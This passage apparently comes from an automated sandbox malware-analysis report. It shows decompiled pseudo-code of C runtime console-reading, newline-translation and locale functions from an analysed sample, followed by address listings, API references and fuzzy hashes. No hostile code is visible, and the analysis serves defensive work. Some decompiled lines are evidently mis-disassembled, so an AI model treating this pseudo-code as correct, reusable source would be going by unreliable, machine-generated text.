														_t398 =  *(_t432 - 0xc);
														if(_t412[1] != _t399) {
															 *_t425 = _t377;
															L133:
															_t425 = _t425 + 2;
															_t412 =  &(_t412[1]);
															goto L143;
														}
														_t295 = 0xa;
														_t412 =  &(_t412[2]);
														 *_t425 = _t295;
														goto L150;
													}
													 *_t425 = _t275;
													goto L133;
												}
												_t378 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
												_t276 =  *(_t378 + _t362 + 4);
												__eflags = _t276 & 0x00000040;
												if((_t276 & 0x00000040) != 0) {
													 *_t425 =  *_t412;
													_t425 = _t425 + 2;
													__eflags = _t425;
												} else {
													 *(_t378 + _t362 + 4) = _t276 | 0x00000002;
												}
												goto L155;
											}
											_t190 = _t432 - 0x10; // 0xeb2b47
											_t400 = 0xa;
											__eflags =  *((intOrPtr*)( *_t190)) - _t400;
											_t398 =  *(_t432 - 0xc);
											if( *((intOrPtr*)( *_t190)) != _t400) {
												goto L123;
											}
											_t273 = _t272 | 0x00000004;
											goto L124;
										}
										_t176 = _t432 - 0x10; // 0xeb2b47
										_t426 =  *_t176;
										asm("cdq");
										_t413 = _t426;
										_t383 = _t426;
										_t401 = _t413 + (_t409 - _t398 >> 1) * 2;
										__eflags = _t413 - _t401;
										asm("cli");
										if(__eflags >= 0) {
											L119:
											_t189 = _t432 - 0x10; // 0xeb2b47
											_t268 =  *_t189;
											_t409 = _t426 - _t268 & 0xfffffffe;
											goto L99;
										} else {
											 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
											_t416 = 0xd;
											while(1) {
												_t299 =  *_t383 & 0x0000ffff;
												__eflags = _t299 -  *((intOrPtr*)(_t432 + 0x10));
												if(_t299 ==  *((intOrPtr*)(_t432 + 0x10))) {
													break;
												}
												__eflags = _t299 - _t416;
												if(_t299 == _t416) {
													__eflags = _t383 - _t401 - 2;
													if(_t383 < _t401 - 2) {
														_t383 = _t383 + 2;
														_t303 = 0xa;
														__eflags =  *_t383 - _t303;
														if( *_t383 != _t303) {
															_t303 = 0xd;
															_t416 = _t303;
														}
														 *_t426 = _t303;
														_t426 = _t426 + 2;
														__eflags = _t426;
													}
												} else {
													 *_t426 = _t299;
													_t426 = _t426 + 2;
													_t383 = _t383 + 2;
												}
												__eflags = _t383 - _t401;
												if(_t383 < _t401) {
													continue;
												} else {
													goto L119;
												}
											}
											_t301 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
											_t185 = _t301 + _t362 + 4;
											 *_t185 =  *(_t301 + _t362 + 4) | 0x00000002;
											__eflags =  *_t185;
											goto L119;
										}
									}
									__eflags = _t375;
									if(_t375 == 0) {
										L43:
										_t304 = _t272 & 0x000000fb;
										__eflags = _t304;
										L44:
										 *(_t424 + _t362 + 4) = _t304;
										_t95 = _t432 - 0x10; // 0xeb2b47
										_t305 =  *_t95;
										_t427 = _t305;
										 *(_t432 - 0x20) = _t305;
										_t384 = _t305 + _t409;
										 *(_t432 - 0x1c) = _t384;
										__eflags = _t305 - _t384;
										if(_t305 >= _t384) {
											L74:
											_t135 = _t432 - 0x10; // 0xeb2b47
											_t268 =  *_t135;
											_t409 = _t427 - _t268;
											__eflags =  *(_t432 + 0x13) - 1;
											if( *(_t432 + 0x13) != 1) {
												goto L99;
											}
											__eflags = _t409;
											if(_t409 == 0) {
												goto L99;
											}
											_t428 = _t427 - 1;
											_t306 =  *_t428;
											__eflags = _t306;
											if(_t306 < 0) {
												_t307 = _t306 & 0x000000ff;
												_t403 = 1;
												__eflags =  *((char*)(_t307 + 0xece408));
												if( *((char*)(_t307 + 0xece408)) != 0) {
													L84:
													_t309 =  *((char*)(( *_t428 & 0x000000ff) + 0xece408));
													__eflags = _t309;
													if(_t309 != 0) {
														__eflags = _t309 + 1 - _t403;
														if(_t309 + 1 != _t403) {
															_t385 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
															__eflags =  *(_t385 + _t362 + 4) & 0x00000048;
															if(__eflags == 0) {
																asm("cdq");
																L00EB3F56(_t385, __eflags,  *((intOrPtr*)(_t432 + 8)),  ~_t403,  ~_t403, 1);
																_t434 = _t434 + 0x10;
															} else {
																_t430 =  &(_t428[1]);
																 *((char*)(_t385 + _t362 + 5)) =  *_t428;
																_t320 =  *(_t432 - 0xc);
																__eflags = _t403 - 2;
																if(_t403 >= 2) {
																	_t322 =  *_t430;
																	_t430 = _t430 + 1;
																	__eflags = _t430;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x25)) = _t322;
																	_t320 =  *(_t432 - 0xc);
																}
																__eflags = _t403 - 3;
																if(_t403 == 3) {
																	_t321 =  *_t430;
																	_t430 = _t430 + 1;
																	__eflags = _t430;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x26)) = _t321;
																}
																_t428 = _t430 - _t403;
															}
														} else {
															_t428 =  &(_t428[_t403]);
														}
														L95:
														_t163 = _t432 - 0x10; // 0xeb2b47
														_t418 =  *_t163;
														_t429 = _t428 - _t418;
														_t409 = MultiByteToWideChar(0xfde9, 0, _t418, _t429,  *(_t432 + 0xc),  *(_t432 - 0x28) >> 1);
														__eflags = _t409;
														if(_t409 == 0) {
															goto L29;
														}
														__eflags = _t409 - _t429;
														_t387 = 0 | _t409 != _t429;
														_t409 = _t409 + _t409;
														__eflags = _t409;
														 *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362 + 0x30) = _t387;
														asm("sbb [eax], dh");
														goto L98;
													}
													 *((intOrPtr*)(E00EAF100())) = 0x2a;
													L31:
													_t364 = _t362 | 0xffffffff;
													L32:
													_t75 = _t432 - 0x10; // 0xeb2b47
													_t268 =  *_t75;
													goto L100;
												}
												_t138 = _t432 - 0x10; // 0xeb2b47
												_t365 =  *_t138;
												while(1) {
													__eflags = _t403 - 4;
													if(_t403 > 4) {
														break;
													}
													__eflags = _t428 - _t365;
													if(_t428 < _t365) {
														break;
													}
													_t428 = _t428 - 1;
													_t403 = _t403 + 1;
													_t324 =  *_t428 & 0x000000ff;
													__eflags =  *((char*)(_t324 + 0xece408));
													if( *((char*)(_t324 + 0xece408)) == 0) {
														continue;
													}
													break;
												}
												_t362 =  *(_t432 - 0x24);
												goto L84;
											}
											_t428 =  &(_t428[1]);
											goto L95;
										}
										_t390 = 0xd;
										_t419 = _t305;
										while(1) {
											_t325 =  *_t419;
											__eflags = _t325 - 0x1a;
											if(_t325 == 0x1a) {
												break;
											}
											__eflags = _t325 - _t390;
											if(_t325 == _t390) {
												__eflags = _t419 -  *(_t432 - 0x1c) - 1;
												if(_t419 >=  *(_t432 - 0x1c) - 1) {
													_t419 = _t419 + 1;
													_t334 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 1, 1, _t432 - 0x14, 0);
													__eflags = _t334;
													if(_t334 != 0) {
														L55:
														__eflags =  *(_t432 - 0x14);
														if( *(_t432 - 0x14) == 0) {
															L70:
															_t398 =  *(_t432 - 0xc);
															_t390 = 0xd;
															 *_t427 = _t390;
															_t427 = _t427 + 1;
															L65:
															__eflags = _t419 -  *(_t432 - 0x1c);
															if(_t419 <  *(_t432 - 0x1c)) {
																continue;
															}
															goto L74;
														}
														_t398 =  *(_t432 - 0xc);
														_t335 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
														__eflags =  *(_t335 + _t362 + 4) & 0x00000048;
														if(( *(_t335 + _t362 + 4) & 0x00000048) == 0) {
															_t120 = _t432 - 0x10; // 0xeb2b47
															__eflags = _t427 -  *_t120;
															if(__eflags != 0) {
																L67:
																L00EB3F56(_t390, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xffffffff, 0xffffffff, 1);
																_t398 =  *(_t432 - 0xc);
																_t434 = _t434 + 0x10;
																_t337 = 0xa;
																__eflags =  *(_t432 - 1) - _t337;
																if( *(_t432 - 1) == _t337) {
																	L63:
																	_push(0xd);
																	L64:
																	_pop(_t390);
																	goto L65;
																}
																_t390 = 0xd;
																 *_t427 = _t390;
																L69:
																_t427 = _t427 + 1;
																goto L65;
															}
															_t338 = 0xa;
															__eflags =  *(_t432 - 1) - _t338;
															if(__eflags != 0) {
																goto L67;
															}
															 *_t427 = _t338;
															_t427 = _t427 + 1;
															__eflags = _t427;
															goto L63;
														}
														_t339 = 0xa;
														_push(0xd);
														__eflags =  *(_t432 - 1) - _t339;
														if( *(_t432 - 1) != _t339) {
															 *_t427 = 0xd;
															_t427 = _t427 + 1;
															 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 1);
														} else {
															 *_t427 = _t339;
															_t427 = _t427 + 1;
														}
														goto L64;
													}
													_t341 = GetLastError();
													__eflags = _t341;
													if(_t341 != 0) {
														goto L70;
													}
													goto L55;
												}
												_t342 = _t419 + 1;
												__eflags =  *_t342 - 0xa;
												if( *_t342 != 0xa) {
													 *_t427 = _t390;
													_t419 = _t342;
													_t427 = _t427 + 1;
													goto L65;
												}
												_t343 = 0xa;
												_t419 = _t419 + 2;
												 *_t427 = _t343;
												goto L69;
											}
											 *_t427 = _t325;
											_t427 = _t427 + 1;
											_t419 = _t419 + 1;
											goto L65;
										}
										_t391 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
										_t326 =  *(_t391 + _t362 + 4);
										__eflags = _t326 & 0x00000040;
										if((_t326 & 0x00000040) != 0) {
											 *_t427 =  *_t419;
											_t427 = _t427 + 1;
											__eflags = _t427;
										} else {
											 *(_t391 + _t362 + 4) = _t326 | 0x00000002;
										}
										goto L74;
									}
									_t92 = _t432 - 0x10; // 0xeb2b47
									__eflags =  *((char*)( *_t92)) - 0xa;
									if( *((char*)( *_t92)) != 0xa) {
										goto L43;
									}
									_t304 = _t272 | 0x00000004;
									goto L44;
								}
								L29:
								_t266 = GetLastError();
								L30:
								E00EAF0DF(_t266);
								goto L31;
							}
						}
					}
					if(( !__esi & 0x00000001) == 0) {
						L2:
						 *(E00EAF0CC()) =  *_t255 & _t409;
						 *((intOrPtr*)(E00EAF100())) = 0x16;
						_t257 = E00EAEB1E();
						L161:
						_t258 = _t257 | 0xffffffff;
						__eflags = _t258;
						goto L162;
					} else {
						_t421 = __esi & 0xfffffffe;
						goto L7;
					}
				}
			}




































































































                0x00ea289a
                0x00ea289a
                0x00ea289a
                0x00ea289a
                0x00eaf8ff
                0x00eaf901
                0x00eaf907
                0x00eaf908
                0x00eaf922
                0x00eaf924
                0x00eaf926
                0x00000000
                0x00eaf928
                0x00eaf928
                0x00eaf92a
                0x00eaf92d
                0x00eaf931
                0x00eaf931
                0x00eaf933
                0x00eaf938
                0x00eaf93b
                0x00eaf93c
                0x00eaf93e
                0x00eaf964
                0x00eaf96c
                0x00eaf96f
                0x00eaf976
                0x00eaf97a
                0x00eaf97a
                0x00eaf97d
                0x00eaf981
                0x00000000
                0x00eaf940
                0x00eaf945
                0x00eaf94b
                0x00eaf950
                0x00000000
                0x00eaf950
                0x00eaf93e
                0x00eaf90a
                0x00eaf90b
                0x00eaf918
                0x00eaf918
                0x00eaf91b
                0x00eaf984
                0x00eaf984
                0x00eaf98b
                0x00eaf98e
                0x00eaf996
                0x00eaf99c
                0x00eaf9a3
                0x00eaf9a9
                0x00eaf9ad
                0x00eaf9b0
                0x00eaf9b8
                0x00eaf9bd
                0x00eaf9c0
                0x00eaf9c5
                0x00eaf9ce
                0x00eaf9d4
                0x00eaf9da
                0x00eaf9dc
                0x00eaf9e4
                0x00eaf9eb
                0x00eaf9ee
                0x00eaf9ef
                0x00eaf9f4
                0x00eaf9fd
                0x00eafa03
                0x00eafa0b
                0x00eafa15
                0x00eafa16
                0x00eafa19
                0x00eafa1a
                0x00eafa1d
                0x00eafa1d
                0x00eafa03
                0x00eaf9f4
                0x00eaf9d4
                0x00eaf9c5
                0x00eaf9a3
                0x00eafa24
                0x00eafa2b
                0x00eafa2f
                0x00eafaa2
                0x00eafab6
                0x00eafabc
                0x00eafabe
                0x00eaff82
                0x00eaff82
                0x00eaff8a
                0x00eaff8b
                0x00eaff8d
                0x00eaffa6
                0x00eaffa9
                0x00000000
                0x00000000
                0x00eaffaf
                0x00000000
                0x00eaffaf
                0x00eaff94
                0x00eaff9f
                0x00000000
                0x00eaff9f
                0x00eafac4
                0x00eafac7
                0x00eafac9
                0x00000000
                0x00000000
                0x00eafacf
                0x00eafad1
                0x00000000
                0x00000000
                0x00000000
                0x00eafa31
                0x00eafa31
                0x00eafa3d
                0x00000000
                0x00000000
                0x00eafa46
                0x00eafa4c
                0x00eafa51
                0x00eafa9f
                0x00000000
                0x00eafa59
                0x00eafa7a
                0x00eafa97
                0x00eafa9a
                0x00eafad7
                0x00eafad7
                0x00eafada
                0x00eafadc
                0x00eafae3
                0x00eafae7
                0x00eafae9
                0x00eafd46
                0x00eafd46
                0x00eafd46
                0x00eafd49
                0x00eafd49
                0x00eafd4c
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffd4
                0x00eaffda
                0x00eaffda
                0x00eafaef
                0x00eafaf3
                0x00eafd66
                0x00eafd6a
                0x00eafde5
                0x00eafde7
                0x00eafdfb
                0x00eafdfb
                0x00eafdfb
                0x00eafdfd
                0x00eafdfd
                0x00eafe01
                0x00eafe01
                0x00eafe04
                0x00eafe06
                0x00eafe09
                0x00eafe0c
                0x00eafe0f
                0x00eafe11
                0x00eaff76
                0x00eaff76
                0x00eaff76
                0x00eaff7b
                0x00000000
                0x00eaff7b
                0x00eafe19
                0x00eafe1a
                0x00eafe21
                0x00eafe23
                0x00eafe23
                0x00eafe26
                0x00eafe2a
                0x00000000
                0x00000000
                0x00eafe30
                0x00eafe33
                0x00eafe40
                0x00eafe42
                0x00eafe71
                0x00eafe85
                0x00eafe8b
                0x00eafe8d
                0x00eafe9d
                0x00eafe9d
                0x00eafea1
                0x00eaff48
                0x00eaff48
                0x00eaff4d
                0x00eaff4e
                0x00eaff51
                0x00eafeff
                0x00eafeff
                0x00eaff02
                0x00000000
                0x00000000
                0x00000000
                0x00eaff08
                0x00eafea7
                0x00eafeaa
                0x00eafeb1
                0x00eafeb6
                0x00eaff0a
                0x00eaff0d
                0x00eaff20
                0x00eaff29
                0x00eaff2e
                0x00eaff31
                0x00eaff36
                0x00eaff37
                0x00eaff3b
                0x00eafefc
                0x00eafefc
                0x00eafefe
                0x00eafefe
                0x00000000
                0x00eafefe
                0x00eaff3f
                0x00eaff40
                0x00eaff43
                0x00eaff43
                0x00000000
                0x00eaff43
                0x00eaff11
                0x00eaff12
                0x00eaff16
                0x00000000
                0x00000000
                0x00eaff18
                0x00eaff1b
                0x00000000
                0x00eaff1b
                0x00eafeba
                0x00eafebb
                0x00eafebd
                0x00eafec1
                0x00eafecb
                0x00eafecc
                0x00eafecf
                0x00eafecf
                0x00eafede
                0x00eafeec
                0x00eafef7
                0x00eafef8
                0x00000000
                0x00eafef8
                0x00eafec3
                0x00eafec6
                0x00000000
                0x00eafec6
                0x00eafe8f
                0x00eafe95
                0x00eafe97
                0x00000000
                0x00000000
                0x00000000
                0x00eafe97
                0x00eafe46
                0x00eafe47
                0x00eafe4b
                0x00eafe4e
                0x00eafe5e
                0x00eafe61
                0x00eafe61
                0x00eafe64
                0x00000000
                0x00eafe64
                0x00eafe52
                0x00eafe53
                0x00eafe56
                0x00000000
                0x00eafe56
                0x00eafe35
                0x00000000
                0x00eafe35
                0x00eaff56
                0x00eaff5d
                0x00eaff61
                0x00eaff63
                0x00eaff70
                0x00eaff73
                0x00eaff73
                0x00eaff65
                0x00eaff67
                0x00eaff67
                0x00000000
                0x00eaff63
                0x00eafde9
                0x00eafdee
                0x00eafdef
                0x00eafdf2
                0x00eafdf5
                0x00000000
                0x00000000
                0x00eafdf7
                0x00000000
                0x00eafdf7
                0x00eafd6c
                0x00eafd6c
                0x00eafd71
                0x00eafd72
                0x00eafd76
                0x00eafd7a
                0x00eafd7d
                0x00eafd7e
                0x00eafd7f
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00000000
                0x00eafd81
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd8e
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd94
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc1
                0x00eafdc3
                0x00000000
                0x00eafdc5
                0x00000000
                0x00eafdc5
                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00000000
                0x00eafdd1
                0x00eafd7f
                0x00eafaf9
                0x00eafafb
                0x00eafb09
                0x00eafb09
                0x00eafb09
                0x00eafb0b
                0x00eafb0b
                0x00eafb0f
                0x00eafb0f
                0x00eafb12
                0x00eafb14
                0x00eafb17
                0x00eafb1a
                0x00eafb1d
                0x00eafb1f
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3a
                0x00eafc3e
                0x00000000
                0x00000000
                0x00eafc44
                0x00eafc46
                0x00000000
                0x00000000
                0x00eafc4c
                0x00eafc4d
                0x00eafc4f
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc85
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd27
                0x00eafd29
                0x00000000
                0x00000000
                0x00eafd34
                0x00eafd36
                0x00eafd39
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00000000
                0x00eafd44
                0x00eafc98
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafa8c
                0x00000000
                0x00eafa8c
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00000000
                0x00000000
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00000000
                0x00eafc80
                0x00eafc82
                0x00000000
                0x00eafc82
                0x00eafc53
                0x00000000
                0x00eafc53
                0x00eafb27
                0x00eafb28
                0x00eafb2a
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00000000
                0x00000000
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00eafb6a
                0x00eafb7c
                0x00eafb82
                0x00eafb84
                0x00eafb90
                0x00eafb90
                0x00eafb94
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00eafbdd
                0x00eafbdd
                0x00eafbe0
                0x00000000
                0x00000000
                0x00000000
                0x00eafbe6
                0x00eafb96
                0x00eafb99
                0x00eafba0
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00eafbda
                0x00eafbda
                0x00eafbdc
                0x00eafbdc
                0x00000000
                0x00eafbdc
                0x00eafc06
                0x00eafc07
                0x00eafc09
                0x00eafc09
                0x00000000
                0x00eafc09
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00000000
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00000000
                0x00eafbd9
                0x00eafba9
                0x00eafbaa
                0x00eafbac
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00000000
                0x00eafbaf
                0x00eafb86
                0x00eafb8c
                0x00eafb8e
                0x00000000
                0x00000000
                0x00000000
                0x00eafb8e
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00000000
                0x00eafb62
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00000000
                0x00eafb57
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00000000
                0x00eafb3b
                0x00eafc17
                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00000000
                0x00eafc24
                0x00eafafd
                0x00eafb00
                0x00eafb03
                0x00000000
                0x00000000
                0x00eafb05
                0x00000000
                0x00eafb05
                0x00eafa7c
                0x00eafa7c
                0x00eafa82
                0x00eafa83
                0x00000000
                0x00eafa88
                0x00eafa51
                0x00eafa2f
                0x00eaf913
                0x00eaf8f0
                0x00eaf8f5
                0x00eaf8d0
                0x00eaffcc
                0x00eaffd1
                0x00eaffd1
                0x00eaffd1
                0x00000000
                0x00eaf915
                0x00eaf915
                0x00000000
                0x00eaf915
                0x00eaf913

                APIs
                • __malloc_crt.LIBCMT ref: 00EAF933
                • GetConsoleMode.KERNEL32(00000080,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFA46
                • ReadConsoleW.KERNEL32(?,?,G+,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFA72
                • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?), ref: 00EAFA7C
                • __dosmaperr.LIBCMT ref: 00EAFA83
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                • String ID: G+$G+
                • API String ID: 3470617983-4250722411
                • Opcode ID: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction ID: 8ad9a3cb26877d49196f97b2105841c718f8084deb61371a1af45866c828a03a
                • Opcode Fuzzy Hash: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction Fuzzy Hash: 8C41F870E146858ECB26CF9D9C84BE9BBE1AF0B308F055175E858AF2B2C631DD0AC750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA5641 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00EA5641(void* __eax, intOrPtr __ebx, short __ecx, void* __edx, signed int __edi, signed int* __esi, void* __eflags) {
				void* _t39;
				signed int _t40;
				signed int _t43;
				void* _t46;
				signed int _t48;
				intOrPtr* _t52;
				signed int _t60;
				signed short _t61;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				void* _t93;
				intOrPtr* _t96;
				void* _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t95 = __esi;
				_t92 = __edi;
				_t91 = __edx;
				_t82 = __ecx;
				_t80 = __ebx;
				asm("adc eax, [ecx+0x682af3]");
				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
				_push(__eax);
				_push(__edi);
				_push(__eax);
				if(__eflags == 0) {
					_t39 = E00EBE1D4(__ecx, __edx);
				} else {
					_t39 = E00EBEA44(__edx);
				}
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					_t40 = E00EBA06A(_t95);
					_pop(_t82);
					__eflags = _t40;
					if(_t40 == 0) {
						_t43 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t80, E00EB5609(_t80) + 1);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L30;
						} else {
							__eflags = 0;
							goto L2;
						}
					} else {
						_t60 = E00EB9FDB(_t95, 0x20001004, _t98 - 0x1dc, 2);
						_t104 = _t101 + 0x10;
						__eflags = _t60;
						if(_t60 == 0) {
							L13:
							_t61 = GetACP();
							 *(_t98 - 0x1dc) = _t61;
						} else {
							_t61 =  *(_t98 - 0x1dc);
							__eflags = _t61;
							if(_t61 == 0) {
								goto L13;
							}
						}
						 *_t92 = _t61 & 0x0000ffff;
						_t92 =  *((intOrPtr*)(_t98 - 0x1e4)) + 1;
						_t63 = L00EB5727( *((intOrPtr*)(_t98 - 0x1d4)), 0x83, _t95,  *((intOrPtr*)(_t98 - 0x1e4)) + 1);
						_t105 = _t104 + 0x10;
						__eflags = _t63;
						if(_t63 != 0) {
							goto L30;
						} else {
							_t64 = L00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t95, _t92);
							_t106 = _t105 + 0x10;
							__eflags = _t64;
							if(_t64 != 0) {
								goto L30;
							} else {
								_t65 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t95, _t92);
								_t107 = _t106 + 0x10;
								__eflags = _t65;
								if(_t65 != 0) {
									goto L30;
								} else {
									_t92 = 0x83;
									goto L18;
								}
							}
						}
					}
				} else {
					_t92 = 0x83;
					_push(_t98 - 0x1d0);
					E00EB7294(_t80, _t82, _t91, 0x83,  *((intOrPtr*)(_t98 - 0x1d4)), 0x83);
					_t107 = _t101 + 0xc;
					if(_t80 == 0) {
						L18:
						_t80 = 0;
						__eflags =  *_t95;
						if( *_t95 == 0) {
							L22:
							_t82 = 0;
							__eflags = 0;
							 *((short*)( *((intOrPtr*)(_t98 - 0x1e0)))) = 0;
							goto L23;
						} else {
							_t70 =  *((intOrPtr*)(_t98 - 0x1e4));
							__eflags = _t70 - _t92;
							if(_t70 >= _t92) {
								goto L22;
							} else {
								_t72 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e0)), _t92, _t95, _t70 + 1);
								_t107 = _t107 + 0x10;
								__eflags = _t72;
								if(_t72 == 0) {
									L23:
									_t92 =  *(_t98 - 0x1f0);
									__eflags = _t92;
									if(_t92 != 0) {
										E00EB32E0(_t92,  *((intOrPtr*)(_t98 - 0x1d8)), 4);
										_t107 = _t107 + 0xc;
									}
									_t80 =  *((intOrPtr*)(_t98 - 0x1d4));
									_t95 =  *(_t98 - 0x1ec);
									_t67 = E00EB55AD( *(_t98 - 0x1ec),  *((intOrPtr*)(_t98 + 0x10)),  *((intOrPtr*)(_t98 - 0x1d4)));
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										L2:
										_pop(_t93);
										_pop(_t97);
										__eflags =  *(_t98 - 4) ^ _t98;
										_pop(_t81);
										return E00EB1E0D(_t81,  *(_t98 - 4) ^ _t98, _t91, _t93, _t97);
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									goto L31;
								}
							}
						}
					} else {
						_t79 = L00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t98 - 0xb0, E00EB5609(_t98 - 0xb0) + 1);
						_t107 = _t107 + 0x14;
						if(_t79 == 0) {
							goto L18;
						} else {
							L30:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							L31:
							E00EAEB49(_t80, _t91);
							asm("int3");
							_push(8);
							_push(0xecc538);
							_t46 = E00EAF1E0(_t80, _t92, _t95);
							_t96 =  *((intOrPtr*)(_t98 + 8));
							if(_t96 != 0) {
								_t48 = E00EB20A9(_t82, 0xd);
								 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
								_t84 =  *((intOrPtr*)(_t96 + 4));
								if( *((intOrPtr*)(_t96 + 4)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t48 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t96 + 4)) != 0xeceac8) {
										E00EB2248( *((intOrPtr*)(_t96 + 4)));
										_pop(_t84);
									}
								}
								 *(_t98 - 4) = 0xfffffffe;
								E00EB78AF();
								if( *_t96 != 0) {
									E00EB20A9(_t84, 0xc);
									 *(_t98 - 4) = 1;
									E00EB4248( *_t96);
									_t52 =  *_t96;
									if(_t52 != 0 &&  *_t52 == 0 && _t52 != 0xece800) {
										E00EB40EE(_t52);
									}
